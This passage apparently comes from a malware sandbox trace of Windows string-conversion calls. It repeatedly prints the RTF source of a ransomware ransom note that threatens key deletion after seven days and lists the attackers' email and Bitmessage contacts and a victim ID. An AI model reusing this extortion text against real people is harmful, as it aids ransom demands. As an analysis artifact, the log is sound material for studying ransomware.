fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.351] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.351] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 